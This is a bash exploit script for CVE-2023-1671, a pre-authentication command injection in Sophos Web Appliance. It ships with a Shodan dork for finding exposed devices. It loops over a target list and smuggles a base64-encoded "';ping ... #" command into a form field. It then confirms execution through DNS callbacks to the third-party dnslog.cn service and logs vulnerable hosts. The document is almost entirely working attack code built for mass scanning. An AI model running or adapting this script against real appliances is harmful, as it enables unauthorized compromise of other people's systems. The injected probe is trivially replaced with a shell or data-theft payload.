Sophos Web Appliance 4.3.10.4 Command Injection

`#!/bin/bash   
# Exploit Title: Sophos Web Appliance 4.3.10.4 - Pre-auth command injection  
# Exploit Author: Behnam Abasi Vanda  
# Vendor Homepage: https://www.sophos.com  
# Version: Sophos Web Appliance older than version 4.3.10.4  
# Tested on: Ubuntu  
# CVE : CVE-2023-1671  
# Shodan Dork: title:"Sophos Web Appliance"  
# Reference : https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce  
# Reference : https://vulncheck.com/blog/cve-2023-1671-analysis  
  
  
  
TARGET_LIST="$1"  
  
# =====================  
BOLD="\033[1m"  
RED="\e[1;31m"  
GREEN="\e[1;32m"  
YELLOW="\e[1;33m"  
BLUE="\e[1;34m"  
NOR="\e[0m"  
# ====================  
  
  
get_new_subdomain()  
{  
cat MN.txt | grep 'YES' >/dev/null;ch=$?  
if [ $ch -eq 0 ];then  
echo -e " [+] Trying to get Subdomain $NOR"  
rm -rf cookie.txt  
sub=`curl -i -c cookie.txt -s -k -X $'GET' \  
-H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' \  
$'http://www.dnslog.cn/getdomain.php?t=0' | grep dnslog.cn`   
echo -e " [+]$BOLD$GREEN Subdomain : $sub $NOR"  
fi  
}  
  
check_vuln()  
{  
curl -k --trace-ascii % "https://$1/index.php?c=blocked&action=continue" -d "args_reason=filetypewarn&url=$RANDOM&filetype=$RANDOM&user=$RANDOM&user_encoded=$(echo -n "';ping $sub -c 3 #" | base64)"  
  
req=`curl -i -s -k -b cookie.txt -X $'GET' \  
-H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' \  
$'http://www.dnslog.cn/getrecords.php?t=0'`  
  
echo "$req" | grep 'dnslog.cn' >/dev/null;ch=$?  
if [ $ch -eq 0 ];then  
echo "YES" > MN.txt  
echo -e " [+]$BOLD $RED https://$1 Vulnerable :D $NOR"  
echo "https://$1" >> vulnerable.lst   
else   
echo -e " [-] https://$1 Not Vulnerable :| $NOR"  
echo "NO" > MN.txt  
fi  
}  
  
echo '  
  
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗ ██████╗███████╗  
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ███║██╔════╝╚════██║  
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗╚██║███████╗ ██╔╝  
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝ ██║██╔═══██╗ ██╔╝   
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██║╚██████╔╝ ██║   
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═╝ ╚═════╝ ╚═╝   
  
██████╗ ██╗ ██╗ ██████╗ ███████╗██╗ ██╗███╗ ██╗ █████╗ ███╗ ███╗ ██╗   
██╔══██╗╚██╗ ██╔╝ ██╔══██╗██╔════╝██║ ██║████╗ ██║██╔══██╗████╗ ████║ ██╗╚██╗   
██████╔╝ ╚████╔╝ ██████╔╝█████╗ ███████║██╔██╗ ██║███████║██╔████╔██║ ╚═╝ ██║   
██╔══██╗ ╚██╔╝ ██╔══██╗██╔══╝ ██╔══██║██║╚██╗██║██╔══██║██║╚██╔╝██║ ▄█╗ ██║   
██████╔╝ ██║ ██████╔╝███████╗██║ ██║██║ ╚████║██║ ██║██║ ╚═╝ ██║ ▀═╝██╔╝   
╚═════╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝   
  
'  
if test "$#" -ne 1; then  
echo " ----------------------------------------------------------------"  
echo " [!] please give the target list file : bash CVE-2023-1671.sh targets.txt "  
echo " ---------------------------------------------------------------"  
exit  
fi  
  
  
  
rm -rf cookie.txt  
echo "YES" > MN.txt  
for target in `cat $TARGET_LIST`  
do  
  
get_new_subdomain;  
echo " [~] Checking $target"  
check_vuln "$target"  
done  
rm -rf MN.txt  
rm -rf cookie.txt  
  
  
  
`